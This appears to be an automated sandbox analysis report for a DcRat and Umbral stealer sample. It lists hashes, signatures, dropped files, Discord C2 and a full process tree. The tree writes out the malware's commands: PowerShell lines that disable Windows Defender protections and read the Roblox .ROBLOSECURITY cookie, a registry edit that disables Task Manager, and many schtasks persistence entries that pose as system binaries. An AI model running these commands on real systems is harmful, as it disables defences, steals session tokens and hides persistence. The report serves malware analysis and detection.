Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
03-05-2024 19:11
Static task
static1
Behavioral task
behavioral1
Sample
898A94F29EDC228CE3BD2054F3D5D6DD.exe
Resource
win7-20240221-en
General
-
Target
898A94F29EDC228CE3BD2054F3D5D6DD.exe
-
Size
4.3MB
-
MD5
898a94f29edc228ce3bd2054f3d5d6dd
-
SHA1
f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5
-
SHA256
a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37
-
SHA512
8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae
-
SSDEEP
49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral2/memory/3196-0-0x0000000000400000-0x000000000084E000-memory.dmp family_umbral behavioral2/files/0x00090000000226f2-5.dat family_umbral behavioral2/memory/1956-83-0x0000025EB33F0000-0x0000025EB3430000-memory.dmp family_umbral -
Process spawned unexpected child process 21 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3772 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3740 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3964 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2780 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2700 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4016 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4144 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 436 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4208 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1580 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3212 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1004 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1676 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2584 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4996 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4752 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2168 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4416 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4744 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2588 2768 schtasks.exe 91 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3616 2768 schtasks.exe 91 -
resource yara_rule behavioral2/memory/3196-0-0x0000000000400000-0x000000000084E000-memory.dmp dcrat behavioral2/files/0x0009000000023434-65.dat dcrat behavioral2/files/0x0007000000023438-219.dat dcrat behavioral2/memory/1548-220-0x0000000000290000-0x00000000004DA000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2700 powershell.exe -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts stealer.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation driverBrokercommon.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation spoolsv.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation 898A94F29EDC228CE3BD2054F3D5D6DD.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation чекер dc.exe Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 5 IoCs
pid Process 1956 stealer.exe 4664 чекер dc.exe 4132 Inject.exe 1548 driverBrokercommon.exe 2020 spoolsv.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 discord.com 20 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Drops file in Program Files directory 6 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe driverBrokercommon.exe File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\22eafd247d37c3 driverBrokercommon.exe File created C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe driverBrokercommon.exe File created C:\Program Files (x86)\Windows Photo Viewer\f3b6ecef712a24 driverBrokercommon.exe File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe driverBrokercommon.exe File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\6203df4a6bafc7 driverBrokercommon.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\bcastdvr\WmiPrvSE.exe driverBrokercommon.exe File created C:\Windows\bcastdvr\24dbde2999530e driverBrokercommon.exe File created C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe driverBrokercommon.exe File created C:\Windows\RemotePackages\RemoteApps\9e8d7a4ca61bd9 driverBrokercommon.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2780 schtasks.exe 4144 schtasks.exe 436 schtasks.exe 4996 schtasks.exe 2168 schtasks.exe 3616 schtasks.exe 3772 schtasks.exe 3964 schtasks.exe 2700 schtasks.exe 1004 schtasks.exe 2584 schtasks.exe 4416 schtasks.exe 2588 schtasks.exe 3740 schtasks.exe 1580 schtasks.exe 1676 schtasks.exe 4016 schtasks.exe 3212 schtasks.exe 4752 schtasks.exe 4744 schtasks.exe 4208 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3744 wmic.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ 898A94F29EDC228CE3BD2054F3D5D6DD.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings чекер dc.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings driverBrokercommon.exe Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings spoolsv.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4344 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2632 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1956 stealer.exe 2700 powershell.exe 2700 powershell.exe 2216 powershell.exe 2216 powershell.exe 3084 powershell.exe 3084 powershell.exe 1492 powershell.exe 1492 powershell.exe 4000 powershell.exe 4000 powershell.exe 1548 driverBrokercommon.exe 1548 driverBrokercommon.exe 1548 driverBrokercommon.exe 1548 driverBrokercommon.exe 1548 driverBrokercommon.exe 1548 driverBrokercommon.exe 1548 driverBrokercommon.exe 1548 driverBrokercommon.exe 1548 driverBrokercommon.exe 1548 driverBrokercommon.exe 1548 driverBrokercommon.exe 1548 driverBrokercommon.exe 1548 driverBrokercommon.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe 2020 spoolsv.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2020 spoolsv.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1956 stealer.exe Token: SeIncreaseQuotaPrivilege 4712 wmic.exe Token: SeSecurityPrivilege 4712 wmic.exe Token: SeTakeOwnershipPrivilege 4712 wmic.exe Token: SeLoadDriverPrivilege 4712 wmic.exe Token: SeSystemProfilePrivilege 4712 wmic.exe Token: SeSystemtimePrivilege 4712 wmic.exe Token: SeProfSingleProcessPrivilege 4712 wmic.exe Token: SeIncBasePriorityPrivilege 4712 wmic.exe Token: SeCreatePagefilePrivilege 4712 wmic.exe Token: SeBackupPrivilege 4712 wmic.exe Token: SeRestorePrivilege 4712 wmic.exe Token: SeShutdownPrivilege 4712 wmic.exe Token: SeDebugPrivilege 4712 wmic.exe Token: SeSystemEnvironmentPrivilege 4712 wmic.exe Token: SeRemoteShutdownPrivilege 4712 wmic.exe Token: SeUndockPrivilege 4712 wmic.exe Token: SeManageVolumePrivilege 4712 wmic.exe Token: 33 4712 wmic.exe Token: 34 4712 wmic.exe Token: 35 4712 wmic.exe Token: 36 4712 wmic.exe Token: SeIncreaseQuotaPrivilege 4712 wmic.exe Token: SeSecurityPrivilege 4712 wmic.exe Token: SeTakeOwnershipPrivilege 4712 wmic.exe Token: SeLoadDriverPrivilege 4712 wmic.exe Token: SeSystemProfilePrivilege 4712 wmic.exe Token: SeSystemtimePrivilege 4712 wmic.exe Token: SeProfSingleProcessPrivilege 4712 wmic.exe Token: SeIncBasePriorityPrivilege 4712 wmic.exe Token: SeCreatePagefilePrivilege 4712 wmic.exe Token: SeBackupPrivilege 4712 wmic.exe Token: SeRestorePrivilege 4712 wmic.exe Token: SeShutdownPrivilege 4712 wmic.exe Token: SeDebugPrivilege 4712 wmic.exe Token: SeSystemEnvironmentPrivilege 4712 wmic.exe Token: SeRemoteShutdownPrivilege 4712 wmic.exe Token: SeUndockPrivilege 4712 wmic.exe Token: SeManageVolumePrivilege 4712 wmic.exe Token: 33 4712 wmic.exe Token: 34 4712 wmic.exe Token: 35 4712 wmic.exe Token: 36 4712 wmic.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 2216 powershell.exe Token: SeDebugPrivilege 3084 powershell.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeIncreaseQuotaPrivilege 3836 wmic.exe Token: SeSecurityPrivilege 3836 wmic.exe Token: SeTakeOwnershipPrivilege 3836 wmic.exe Token: SeLoadDriverPrivilege 3836 wmic.exe Token: SeSystemProfilePrivilege 3836 wmic.exe Token: SeSystemtimePrivilege 3836 wmic.exe Token: SeProfSingleProcessPrivilege 3836 wmic.exe Token: SeIncBasePriorityPrivilege 3836 wmic.exe Token: SeCreatePagefilePrivilege 3836 wmic.exe Token: SeBackupPrivilege 3836 wmic.exe Token: SeRestorePrivilege 3836 wmic.exe Token: SeShutdownPrivilege 3836 wmic.exe Token: SeDebugPrivilege 3836 wmic.exe Token: SeSystemEnvironmentPrivilege 3836 wmic.exe Token: SeRemoteShutdownPrivilege 3836 wmic.exe Token: SeUndockPrivilege 3836 wmic.exe Token: SeManageVolumePrivilege 3836 wmic.exe -
Suspicious use of WriteProcessMemory 54 IoCs
description pid Process procid_target PID 3196 wrote to memory of 1956 3196 898A94F29EDC228CE3BD2054F3D5D6DD.exe 83 PID 3196 wrote to memory of 1956 3196 898A94F29EDC228CE3BD2054F3D5D6DD.exe 83 PID 3196 wrote to memory of 4664 3196 898A94F29EDC228CE3BD2054F3D5D6DD.exe 84 PID 3196 wrote to memory of 4664 3196 898A94F29EDC228CE3BD2054F3D5D6DD.exe 84 PID 3196 wrote to memory of 4664 3196 898A94F29EDC228CE3BD2054F3D5D6DD.exe 84 PID 3196 wrote to memory of 4132 3196 898A94F29EDC228CE3BD2054F3D5D6DD.exe 85 PID 3196 wrote to memory of 4132 3196 898A94F29EDC228CE3BD2054F3D5D6DD.exe 85 PID 4664 wrote to memory of 3320 4664 чекер dc.exe 88 PID 4664 wrote to memory of 3320 4664 чекер dc.exe 88 PID 4664 wrote to memory of 3320 4664 чекер dc.exe 88 PID 1956 wrote to memory of 4712 1956 stealer.exe 89 PID 1956 wrote to memory of 4712 1956 stealer.exe 89 PID 1956 wrote to memory of 4408 1956 stealer.exe 92 PID 1956 wrote to memory of 4408 1956 stealer.exe 92 PID 1956 wrote to memory of 2700 1956 stealer.exe 94 PID 1956 wrote to memory of 2700 1956 stealer.exe 94 PID 1956 wrote to memory of 2216 1956 stealer.exe 96 PID 1956 wrote to memory of 2216 1956 stealer.exe 96 PID 1956 wrote to memory of 3084 1956 stealer.exe 98 PID 1956 wrote to memory of 3084 1956 stealer.exe 98 PID 1956 wrote to memory of 1492 1956 stealer.exe 100 PID 1956 wrote to memory of 1492 1956 stealer.exe 100 PID 1956 wrote to memory of 3836 1956 stealer.exe 102 PID 1956 wrote to memory of 3836 1956 stealer.exe 102 PID 1956 wrote to memory of 2968 1956 stealer.exe 104 PID 1956 wrote to memory of 2968 1956 stealer.exe 104 PID 1956 wrote to memory of 3564 1956 stealer.exe 106 PID 1956 wrote to memory of 3564 1956 stealer.exe 106 PID 1956 wrote to memory of 4000 1956 stealer.exe 108 PID 1956 wrote to memory of 4000 1956 stealer.exe 108 PID 3320 wrote to memory of 548 3320 WScript.exe 110 PID 3320 wrote to memory of 548 3320 WScript.exe 110 PID 3320 wrote to memory of 548 3320 WScript.exe 110 PID 548 wrote to memory of 1548 548 cmd.exe 112 PID 548 wrote to memory of 1548 548 cmd.exe 112 PID 1956 wrote to memory of 3744 1956 stealer.exe 113 PID 1956 wrote to memory of 3744 1956 stealer.exe 113 PID 1548 wrote to memory of 4556 1548 driverBrokercommon.exe 136 PID 1548 wrote to memory of 4556 1548 driverBrokercommon.exe 136 PID 548 wrote to memory of 4344 548 cmd.exe 138 PID 548 wrote to memory of 4344 548 cmd.exe 138 PID 548 wrote to memory of 4344 548 cmd.exe 138 PID 4556 wrote to memory of 740 4556 cmd.exe 139 PID 4556 wrote to memory of 740 4556 cmd.exe 139 PID 1956 wrote to memory of 916 1956 stealer.exe 140 PID 1956 wrote to memory of 916 1956 stealer.exe 140 PID 916 wrote to memory of 2632 916 cmd.exe 142 PID 916 wrote to memory of 2632 916 cmd.exe 142 PID 4556 wrote to memory of 2020 4556 cmd.exe 143 PID 4556 wrote to memory of 2020 4556 cmd.exe 143 PID 2020 wrote to memory of 2996 2020 spoolsv.exe 144 PID 2020 wrote to memory of 2996 2020 spoolsv.exe 144 PID 2020 wrote to memory of 4048 2020 spoolsv.exe 145 PID 2020 wrote to memory of 4048 2020 spoolsv.exe 145 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4408 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\stealer.exe"C:\Users\Admin\AppData\Local\Temp\stealer.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4712
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"3⤵
- Views/modifies file attributes
PID:4408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2968
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4000
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:3744
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:916 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:2632
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3320 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:548 -
C:\MsWinsessiondllNet\driverBrokercommon.exe"C:\MsWinsessiondllNet\driverBrokercommon.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dFjI7tVufc.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:4556 -
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:740
-
-
C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe"C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f7f3a5f-13d0-4896-b122-f11ad12acd3b.vbs"8⤵PID:2996
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bd577cd0-adcf-48e3-95fc-6ecef81cdaf1.vbs"8⤵PID:4048
-
-
-
-
-
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f5⤵
- Modifies registry key
PID:4344
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Inject.exe"C:\Users\Admin\AppData\Local\Temp\Inject.exe"2⤵
- Executes dropped EXE
PID:4132
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3772
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3964
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2780
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2700
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4016
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4144
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4208
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1004
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1676
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2584
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4996
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2168
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4416
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4744
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2588
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3616
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD5d84e590c3715c79dc5b92c435957d162
SHA12901580903e4b356448d9fe7bea510261e655363
SHA256d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba
SHA512b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485
-
Filesize
158B
MD5ea70d7b0f1a8a1ff2d246efbdcfe1001
SHA1252e762aee8fcc5761e17bb84aa3af8276852f5c
SHA2561947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31
SHA5121fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86
-
Filesize
218B
MD57c9bb5fda146efee5ee4a243d6e404b0
SHA1c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd
SHA2561d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b
SHA512797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
